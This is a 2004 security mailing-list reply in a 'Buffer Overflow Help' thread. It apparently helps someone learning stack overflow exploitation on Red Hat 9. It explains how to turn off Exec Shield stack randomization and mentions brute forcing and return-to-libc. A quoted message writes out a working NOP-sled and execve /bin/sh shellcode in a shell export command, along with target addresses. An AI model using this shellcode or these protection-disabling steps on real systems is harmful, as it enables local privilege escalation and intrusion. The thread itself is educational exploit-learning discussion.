Re: Buffer Overflow Help

[runixd <runixd () nullcode net>]

On Wed, 2004-11-10 at 12:01 +0200, Harry de Grote wrote:
> Op Tuesday 09 November 2004 04:09, eip () tampabay rr com sgreifde:
> <snip>
> > I am running GCC version 3.2.2 20030222 (Red Hat Linux 3.2.2-5) on a Redhat
> > 9 box kernel 2.4.20-31.9. Am I doing something wrong?
>
> no, you don't
>
> but... RH does randomize the stack a little iirc

> so, my way of doing stuff then, is just brute force it! :)
> (you could also return tu libc or whatever)

How would returning to libc help with randomized stack?

Brute forcing should help, but while learning its probably better to run
vanilla kernel or disable Exec Shield. Depending on your version,
options may very, but you should be able to disable stack randomization
by setting
/proc/sys/kernel/exec-shield-randomize to 0
"echo 0 > /proc/sys/kernel/exec-shield-randomize"

and you can disable exec shield in /proc/sys/kernel/exec-shield, setting
it to 0, should cause it to be disabled, otherwise this is where you
have to work with non executable stack and return to libc.

You can start reading about Exec Shield at
http://people.redhat.com/mingo/exec-shield/ANNOUNCE-exec-shield

> best way to do it (i think) is : put your shellcode in the env...
>
> export SHELLCODE=`perl -e '{print "\x90"x65000 . 
> "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"}'`
>
> that should give you some breathing space for where to jump to...
>
> shellcode starts (on my box at 0xbfff0027, so everything from there to 
> 0xbffffe00 sould do fine...

regards